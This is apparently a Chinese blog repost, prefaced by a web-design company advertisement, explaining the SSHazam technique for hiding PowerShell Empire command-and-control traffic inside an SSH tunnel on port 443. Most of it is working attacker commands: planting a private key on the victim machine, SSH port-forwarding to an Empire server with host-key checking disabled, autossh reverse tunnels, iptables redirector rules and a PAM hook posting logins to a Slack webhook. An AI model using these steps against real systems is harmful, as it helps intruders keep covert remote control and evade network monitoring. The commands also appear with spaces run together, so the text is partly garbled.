這篇文章將為大家詳細(xì)講解有關(guān)SSHazam中怎么利用SSH隧道實現(xiàn)隱蔽C2通信，小編覺得挺實用的，因此分享給大家做個參考，希望大家閱讀完這篇文章后可以有所收獲。

鼎城網(wǎng)站制作公司哪家好，找創(chuàng)新互聯(lián)！從網(wǎng)頁設(shè)計、網(wǎng)站建設(shè)、微信開發(fā)、APP開發(fā)、自適應(yīng)網(wǎng)站建設(shè)等網(wǎng)站項目制作，到程序開發(fā)，運營維護。創(chuàng)新互聯(lián)公司2013年成立到現(xiàn)在10年的時間，我們擁有了豐富的建站經(jīng)驗和運維經(jīng)驗，來保證我們的工作的順利進行。專注于網(wǎng)站建設(shè)就選創(chuàng)新互聯(lián)。

SSHazam這種技術(shù)可以幫助你將任何C2工具的通信流量隱藏在標(biāo)準(zhǔn)SSH通信信道中以躲避網(wǎng)絡(luò)監(jiān)測。

直奔主題

在下面的演示樣本中，我們會運行PowerShell Empire，它會連接至目標(biāo)用戶的localhost端口。本地端口會通過一個SSH連接將流量轉(zhuǎn)發(fā)至遠(yuǎn)程Empire服務(wù)器，這樣檢測工具檢測到的流量就只有SSH流量了。目標(biāo)系統(tǒng)為OS X，但這種技術(shù)還可以利用Plink.exe【下載地址】在Windows平臺上實現(xiàn)。

上圖顯示的是，目標(biāo)系統(tǒng)有一個監(jiān)聽端口5430的SSH信道，會將所有接收到的數(shù)據(jù)轉(zhuǎn)發(fā)至Empire服務(wù)器。Empire服務(wù)器運行了Empire實例并在其localhost（127.0.0.1:5430）監(jiān)聽著相同的端口。為了更好地隱藏SSH流量，我們還讓SSH服務(wù)器監(jiān)聽端口443，而不是標(biāo)準(zhǔn)端口22。別忘了修改SSH配置文件，來讓它監(jiān)聽這個端口，然后修改云防火墻來允許流量通過。

你還需要在建立連接前往目標(biāo)系統(tǒng)中拷貝一份私鑰，對應(yīng)的公鑰必須添加到Empire服務(wù)器中的authorized_keys文件中。在演示樣例中，我們會將私鑰文件放在目標(biāo)系統(tǒng)的~/.ssh/.do.key。下面的操作步驟需要在命令行中執(zhí)行：

mkdir~/.sshchmod700 ~/.sshecho-----BEGIN RSA PRIVATE KEY----- >> ~/.ssh/.do.keyechoMIIJKAIBAAKCAgEArVuMJdwgl9z9s1C0mrYV05hwUevmY+CkJaY/1iiPJSE6/AAp >>~/.ssh/.do.keyecho+qkMZ9nrHkBQtaQMrXPW5MQXLxU/o8LQ5QyPiy/B4FiGEfNSx//mSJvEYAXXN4zC >>~/.ssh/.do.keyechoRkiQ5Eir83CLCZFLRWV8wFvNkGV2krxMXDtHHFL5ars/J7tdBekmYI62eXnE5oXl >>~/.ssh/.do.keyechoNHky2x6YsnQf5lOkC1XyWvwg77gR2kRhb9KpOi+hp6xB42o00mpbZgyY5V4= >>~/.ssh/.do.keyecho-----END RSA PRIVATE KEY----- >> ~/.ssh/.do.keychmod600 ~/.ssh/.do.key

為了防止其他人訪問這個私鑰，你需要修改Empire服務(wù)器的配置。編輯/etx/passwd，并將登錄路徑修改為/bin/false：

victim:x:1001:1001:VictimGuy,,,:/home/victim:/bin/false

將私鑰存在目標(biāo)系統(tǒng)中之后，只需要運行下列命令即可開啟SSH信道和端口了：

ssh -i~/.ssh/.do.key  -p 443 -N -f-oStrictHostKeyChecking=no victim@empire-server.corp.com -L 5430:127.0.0.1:5430

現(xiàn)在需要配置PowerShell Empire，或者你自己的C2，來監(jiān)聽127.0.0.1:5430。此時，所有的C2流量都會隱藏在加密的SSH信道中，你也無需擔(dān)心其他的網(wǎng)絡(luò)監(jiān)測工具了。

技術(shù)分析

這種技術(shù)其實非常簡單，可以直接給到你C2會話。有時你可能不想把客戶的敏感信息存放到第三方的云服務(wù)器中，這樣你就需要設(shè)置一個額外的重定向工具來將云主機的流量轉(zhuǎn)發(fā)到你自己的網(wǎng)絡(luò)中了。整個流程大致如下圖所示：

C2連接會通過SSH信道轉(zhuǎn)發(fā)至Empire重定向器。Empire重定向器的防火墻規(guī)則會將流量轉(zhuǎn)發(fā)至另一個重定向器（中間件），然后建立逆向SSH連接將流量轉(zhuǎn)發(fā)至最終的目的地。

需要在目標(biāo)設(shè)備上運行的SSH命令如下：

ssh-i ~/.ssh/.do.key  -p 443 -N -f-oStrictHostKeyChecking=no victim@empire-redirector.corp.com -L5430:127.0.0.1:5431

在攻擊主機上運行的SSH命令如下：

autossh-M 5431 -o ServerAliveInterval=30 -R 5433:10.10.10.185:5430 root@redirector.corp.com

你可能還需要先安裝autossh，因為它可以讓你的SSH信道長時間保持通信狀態(tài)。

Empire重定向器的IP Table規(guī)則如下：

iptables-t nat -A OUTPUT -m addrtype --src-type LOCAL --dst-type LOCAL -p tcp -mmultiport --dports 5430:65535 -j DNAT --to-destination 128.62.137.184:5432iptables-t nat -A POSTROUTING -m addrtype --src-type LOCAL --dst-type UNICAST -jMASQUERADEsysctl-w net.ipv4.conf.all.route_localnet=1

此時，工具會將端口5430至端口65535的流量全部轉(zhuǎn)發(fā)至最終的重定向器，這樣你就可以捕捉目標(biāo)用戶的全部流量了。

重定向器的IP Table規(guī)則如下：

sysctl-w net.ipv4.conf.all.route_localnet=1iptables-t nat -I PREROUTING -p tcp --dport 5432 -j DNAT --to 127.0.0.1:5433

這看起來有些復(fù)雜，但是這種方法非常實用，可以保護你云端外的敏感數(shù)據(jù)。

如果你想在SSH連接建立成功之后收到通知的話，可以在/etc/pam.d/sshd文件中添加下列兩行代碼：

session[success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.soopensessionoptional pam_exec.so /home/root/ssh-slack-alert.sh

我的通知提醒腳本代碼如下：

#!/usr/bin/envbash if ["$PAM_USER" != "admin" ] && [ $PAM_TYPE !="close_session" ]thenmessage="\`\`\`PamType:$PAM_TYPE\nSSH-User: $PAM_USER\nRhost: $PAM_RHOST\nServer: SSHazam\nHostname:`hostname`\`\`\`" curl-X POST \  --data-urlencode"payload={\"channel\": \"alerts\",\"username\": \"SSHazam\", \"text\":\"${message}\", \"icon_emoji\": \":boom:\"}"\ https://hooks.slack.com/services/YOUR/SLACK/HOOKHEREfi

關(guān)于“SSHazam中怎么利用SSH隧道實現(xiàn)隱蔽C2通信”這篇文章就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，使各位可以學(xué)到更多知識，如果覺得文章不錯，請把它分享出去讓更多的人看到。